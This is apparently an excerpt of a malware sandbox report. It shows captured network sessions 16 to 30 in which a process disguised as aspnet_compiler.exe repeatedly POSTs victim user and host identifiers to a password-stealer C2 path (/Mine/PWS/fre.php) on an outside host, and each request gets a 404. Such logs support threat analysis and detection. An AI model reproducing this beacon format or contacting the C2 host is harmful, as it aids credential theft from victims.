                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.455890188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:51.097384930 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:51.102415085 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:51.830784082 CEST579INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2FMVh8%2FzavsZ%2F%2B7Vjoi7eSByvQUb%2BHhllcuqWA%2FBCxd3nKqgJrFLx%2FXUb4oQRIEwAzqE5N0DLXEIxdSGORQIwHJ92TGcllCrhBrUTsnir%2Fm9w%2BnsgvQG3QUFhJrmkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c1a0ba94388-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.455892188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:51.987924099 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:51.992772102 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:52.731527090 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qq5Cj405RHOFluwRyNentphqjmUqM3hbL344qXMXXrmxzdw%2BWMKHTE0599W2mdjHhLkeeIlSfn92wzcQKyHE5eZcjPUCPq8Xg%2FfTAvFP0oSZ0Fvn0Y4i3t8kfG64rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c1f7c5e8c12-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.455893188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:52.876682997 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:52.881678104 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:53.549809933 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJ2IOR4pOOmPP7cmYLyQt5VX%2BzHvj%2B5ECTDB5tYmomcLO0C10WLyS91Zpx%2FQzMLEIN8sAcGGXueHZNk87lexHcqS8d5zusB%2Bg4dipv4tdfdexbVO1uwjJbIZLiOXwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c24fedc1986-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.455894188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:53.721658945 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:53.727655888 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:54.379558086 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlAjJ8Qg6Ff6%2BgP4TQX37tzjqpqjM9tzK2CQWH17DRMtL6AVe0%2BU7be5hXxd0359%2B5blwEXSy5fHPFmehABuH%2BUfY0WSJ0KMJx7xrDr2iA2VJaV7OPdNnzxGyxxRhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c2a4ea17d18-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.455895188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:54.532691956 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:54.537764072 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:55.229852915 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtT02wdkKW0NiE6Gsijqu4V3%2BjuGyqbIuFoAdXovGJJL%2Bjh0ryKOeDEvO%2FYa4UkzeyXjRMceZBpKsfthTCfIefeSzdu21h2lFmodgkjJNeYmtwOAizvTQmpBL7cusQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c2f5c0c5e76-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.455896188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:55.508654118 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:55.513578892 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:56.263027906 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CgVtUfzbdU%2BspHap4sRciP6hQpKJST12uEnPafC8Ah5q5%2FHGOjFAuoItHpevTcFXcMtaPUOaFYTgehH6jnar3%2Bldm0lEzsNLIJlY0%2BjdhMAZif2pWDf2eOLeTs0FqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c357b058c0c-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.455897188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:56.407444000 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:56.412404060 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:57.191807985 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XuGHxOcWUC0ysvT2VmTBfS8bj%2BItpq%2Bnfr3Abdd6Kkb1RgKifoYmtXFin1Ton75loC9dhkkpZi3XdT4NlQIpjLtKPesn7dPCwpMc0TVo7dYLvwsdHp38cd1Kkjshfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c3b2d1a0f83-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.455898188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:57.593775988 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:57.598722935 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:58.321290016 CEST561INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9SgeCtD74V9z6FzuVFMUtfv6wTty84L8LyRpUr4lsKH7zxkg45vOwo4WmGbN6CUkVAXtFazh75NYDmh52unJ3rZt8R5ddobG7xrKvLKKkB8T3hs5GD5UruE3yc2qQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c427f056a55-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.455899188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:58.469784975 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:58.474678040 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:28:59.169311047 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0erpvwprs%2F1GlF1S2zhM66LqDqIvZUEp7vYse%2B0lXu9IA8xAFoD%2BDsd3kNo3AqXmG0bPa84CcrzEF6Hasgvz0Q539xRtmuA0HwQYxGpXBz9s1DAUVAG1Cz6rnXv%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c47fdfe4246-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.455900188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:59.477629900 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:28:59.484195948 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:00.300595045 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xV%2BB5qD1Yd3zPOgd8f2rP6tfzCIFL18jrdOSkEMQb9vMvMU6PNf8rueozDe7CmOCGiUjv42%2FtwGAmBhvpGkhkZ6uBxedCUNcKGbzFRhiViUxyFg0RsxNx%2FAQMOqzKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c4e5ef34304-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.455901188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:00.468620062 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:00.473536015 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:01.202205896 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Y2YrUsCod5f6rEk2RjWB5or%2FgQNV4s2y1c%2FP8h29H%2B0vQjW66XsN2PVCKx7KlJBG1VcVKMGYSFv6584O3X%2BM1dXcdlWwGPthPq6UiQXS9tlpbEl4rTYNZvS628pgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c548e43c448-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.455902188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:01.367449045 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:01.372432947 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:02.085413933 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjaS1C%2B5qyGeUVkysgFhLS7yN4MId4T2nL5Txdh9gKuqS9q6eUDmrXaFKCQY9tysJYdaAqVcMxFIpEOqoVxifdXMdD%2FOOWzoITlpCJcyPc604sG7F1rYn%2FuI0g7NbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c5a1fc3c3f5-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.455903188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:02.234904051 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:02.239881039 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:03.023292065 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NdkSRxxj5GgSbDnDU4wQjq4kN9vggs1VEHzSjB5NpdNwqH5Qy1whvD2Fvg76FCQ9DsCwHHWRuIXP4tp4TIDH%2F5zHZUi96NURjzQIaCYkVJAOdn%2FbOCYaGlCvkXUug%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c5f9f130c8e-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.455904188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:03.271222115 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:03.276279926 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:03.936767101 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyxAcmXOfmyZHmlfTUdxE4hEL%2B5fKlmDYmp6L33qxOrVOSVo1rhveg2zpXwYx8Kh1wB%2BgJIca89JvOt37SqCBR8xM92MC1laLkIBZaVtUi8xQKqXj6IlyOHIRyTxNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5c65cbd54368-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.455905188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:04.094444990 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:04.099860907 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:04.757303953 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
